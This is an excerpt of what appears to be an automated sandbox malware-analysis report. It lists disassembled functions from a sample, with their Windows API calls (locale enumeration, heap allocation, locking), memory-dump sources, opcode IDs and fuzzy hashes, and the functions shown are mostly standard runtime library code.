                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 276034861a9164e40ad21649232bf9a377c8788dc4334ff7c31fa38f3679a971
                                                                                                                                                                                                                                                    • Instruction ID: f1e0ec8c27c273e7964a06451ea3a4a8ed4a77eabebbf1c35d105c8bad57fa86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276034861a9164e40ad21649232bf9a377c8788dc4334ff7c31fa38f3679a971
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4911E132A1C256C6E764BF66A0401B9B2B0EB81B60FD48136DB29473C4DE38E8858B10
                                                                                                                                                                                                                                                    Function 00007FF749F97FE8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF749F986E0,00000000,00000092,?,?,00000000,?,?,00007FF749F8D493), ref: 00007FF749F98066
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    • Opcode ID: 39dc7ac0f12912b948c2acf28637d46675b9d8229f2a11fe64d436b3012b3495
                                                                                                                                                                                                                                                    • Instruction ID: a1b8f899fbcd748f004afe648dd458e55b89d5350c82746a86503cbd22a424f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39dc7ac0f12912b948c2acf28637d46675b9d8229f2a11fe64d436b3012b3495
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4301B162F0C281C6E7107F16E4407B9B6B1EB41BA4FC59231D629472E5CF6D9480CB10
                                                                                                                                                                                                                                                    Function 00007FF749F775BC Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 69ca287d5164a35a68b98fbd24b1908fccca41dda8a4977f78ac53e608727651
                                                                                                                                                                                                                                                    • Instruction ID: abc0d672e6fee2773fa971c31a9a8ad78acb594a531c14d58b0d93e64db3c199
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69ca287d5164a35a68b98fbd24b1908fccca41dda8a4977f78ac53e608727651
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F05836E3D842C2E7AABE1D9859B7892B0EF84308FD00976F50B826D8CF5CE440C761
                                                                                                                                                                                                                                                    Function 00007FF749F90EE4 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF749F9132C,?,?,?,?,?,?,?,?,00000000,00007FF749F9753C), ref: 00007FF749F90F1A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    • Opcode ID: fe6d5dccc86e6788a8ab950fd3b15e63935f77aaf88324344d2b932bbdaae442
                                                                                                                                                                                                                                                    • Instruction ID: dad6a2e4c83d6cf8e67ce6342b8e159bf9f701354bc061065d00ba03c55840fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe6d5dccc86e6788a8ab950fd3b15e63935f77aaf88324344d2b932bbdaae442
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF0D432B18A45C2E700FF16E894769A3B5EB98B80FA88035D659473A5CF3CD8A4C750
                                                                                                                                                                                                                                                    Function 00007FF749F8EE38 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                                                    • API String ID: 0-1523873471
                                                                                                                                                                                                                                                    • Opcode ID: bcc98a79a9fba4e5ba45007b45d9affdbf7001df6ef1ef910aab9cb3b0d765c0
                                                                                                                                                                                                                                                    • Instruction ID: e7f9c7e16b89adc199ebd8ad564456a43e3fab88c7541b1eb7cec7c42705158e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcc98a79a9fba4e5ba45007b45d9affdbf7001df6ef1ef910aab9cb3b0d765c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA14462B2C7C68AEB61EF25A4007AAFBA0AB54B84F448032DE8D577C5DB3DE401C751
                                                                                                                                                                                                                                                    Function 00007FF749F93790 Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00007FF749F93835
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F90E30: HeapAlloc.KERNEL32(?,?,00000000,00007FF749F8EA4F), ref: 00007FF749F90E85
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: HeapFree.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5D6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: GetLastError.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5E0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F9A690: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F9A6C3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 916656526-0
                                                                                                                                                                                                                                                    • Opcode ID: 19b0fd171d736a255338e524c416d1d230ff308197f25ddfe13bf518aa09b7ea
                                                                                                                                                                                                                                                    • Instruction ID: 589796194460e099be3381308902ef3f4d83f9e2d1553f6ad7a7f1818daf28c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19b0fd171d736a255338e524c416d1d230ff308197f25ddfe13bf518aa09b7ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941F322F0D24381FB70BE666811B7AE6A16F86BC4F940535EE4D47BD5EE7CE4018320
                                                                                                                                                                                                                                                    Function 00007FF749F421E0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F77E4C: AcquireSRWLockExclusive.KERNEL32(?,?,00000004,00007FF749F42267,?,?,?,00007FF749F437E1), ref: 00007FF749F77E5C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF749F437E1), ref: 00007FF749F42216
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F77DE0: AcquireSRWLockExclusive.KERNEL32(?,?,00000004,00007FF749F422CC,?,?,?,00007FF749F437E1), ref: 00007FF749F77DF0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F77DE0: ReleaseSRWLockExclusive.KERNEL32(?,?,00000004,00007FF749F422CC,?,?,?,00007FF749F437E1), ref: 00007FF749F77E30
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$Acquire$HeapProcessRelease
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3865638231-0
                                                                                                                                                                                                                                                    • Opcode ID: 61f53ec1994c4fdb8881b8707cf0538e69b1abd78c7f7c29306060b4ecc32df1
                                                                                                                                                                                                                                                    • Instruction ID: b7aecb87c986793777a434378365f5849f0b614c4a1f84caadeca4de115f2a8d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61f53ec1994c4fdb8881b8707cf0538e69b1abd78c7f7c29306060b4ecc32df1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D219221E9DA03D6EB00BF28EC856B4B2B5AF54329FE45175D81C822F1DF2CE695C720
                                                                                                                                                                                                                                                    Function 00007FF749F75160 Relevance: .7, Instructions: 727COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: 9e8b796dbb6a1d9e81a6458b066a37f6f863064e388ab306fec1ae10bb522697
                                                                                                                                                                                                                                                    • Instruction ID: 271578ea3fdc10961c5aef1e7cdb09d98c5bb7199ecc446f88bdeb529e676f09
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e8b796dbb6a1d9e81a6458b066a37f6f863064e388ab306fec1ae10bb522697
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54723722A0CA85C5EB54AF1AD49027CB7B1FB44B98F948171EA5E477E1DF3DE462C320
                                                                                                                                                                                                                                                    Function 00007FF749F892C4 Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 443252259-0
                                                                                                                                                                                                                                                    • Opcode ID: fda9ed7ec09c402308548bee876b6f52b5aaf7f4d1c35ce60392bf0a69c1a8d9
                                                                                                                                                                                                                                                    • Instruction ID: 0237c297b665a037333c61f3a2b3d44c661681ec8b534ce96f3f890ca720ff60
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fda9ed7ec09c402308548bee876b6f52b5aaf7f4d1c35ce60392bf0a69c1a8d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B812C361B1CA4AC5EFA0FE2598081B9E3A5FB54BA0F945631CA6E577D0DF39E482C310
                                                                                                                                                                                                                                                    Function 00007FF749F741C8 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: 3a3f53e26725aee8d9f9124111f58d9d846b1aa7fd0e075e141c3c6f2682eb13
                                                                                                                                                                                                                                                    • Instruction ID: ed0916314f52222ef3110d7d296e30f81ccf63a804937e03560b57ae8c4529a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a3f53e26725aee8d9f9124111f58d9d846b1aa7fd0e075e141c3c6f2682eb13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3722A022B0CA85C6EB11AF25D4442ADE3B2FB94B88F854171EE8D17B95EE3CE545C710
                                                                                                                                                                                                                                                    Function 00007FF749F680E8 Relevance: .5, Instructions: 491COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3382485803-0
                                                                                                                                                                                                                                                    • Opcode ID: dfba43b60f2aa14815d3e6ec4e9cfb66ede2106a05633d32278d8cbd7d641432
                                                                                                                                                                                                                                                    • Instruction ID: 05473ecb5a6b4eb64f608ca3e2df02a1ef5b97c8d23a0a7c6cf6e4703eade0ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfba43b60f2aa14815d3e6ec4e9cfb66ede2106a05633d32278d8cbd7d641432
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F229C22A1CB85C6EB14AF29C4401BDA771FB94B88F945136EB4D43BA5EF3CD986C350
                                                                                                                                                                                                                                                    Function 00007FF749F6881C Relevance: .5, Instructions: 491COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: bbd34a78ec0c66727cb7ea32f46b40ec62c96aff321a2ec60c918f94de3a82dd
                                                                                                                                                                                                                                                    • Instruction ID: 7c7f1fc6afc7af293bb9c5fcdefcb7a6b192091260090ec98254ecfb4418f9f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbd34a78ec0c66727cb7ea32f46b40ec62c96aff321a2ec60c918f94de3a82dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17229D22A1CB85C6EB14AF25C4501BDA771FB94B88FC05136EA4D53BA5EF3CE986C350
                                                                                                                                                                                                                                                    Function 00007FF749F81858 Relevance: .4, Instructions: 421COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c2f988bff49f3a4abbbf32aacabf4a3712aacff4782916a646cfe534fbd0950b
                                                                                                                                                                                                                                                    • Instruction ID: c3bf23b982f716bce00e78b352482008a87cb8cbb77db6e10c6822102c954239
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2f988bff49f3a4abbbf32aacabf4a3712aacff4782916a646cfe534fbd0950b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4027962B0C606C6EBA4FF29C48097CE7B1FB45B58BA44731CA1D276D4DB38E952C360
                                                                                                                                                                                                                                                    Function 00007FF749F8D2D4 Relevance: .3, Instructions: 311COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4003095782-0
                                                                                                                                                                                                                                                    • Opcode ID: c21c31f2fc2676bda15469c0d822a7cb30643392ec22c1bd56d11ecf36906c54
                                                                                                                                                                                                                                                    • Instruction ID: 117e66a9c1250e154b561e77fa35b292016de20cdf6be8fd47a5a3819a8261aa
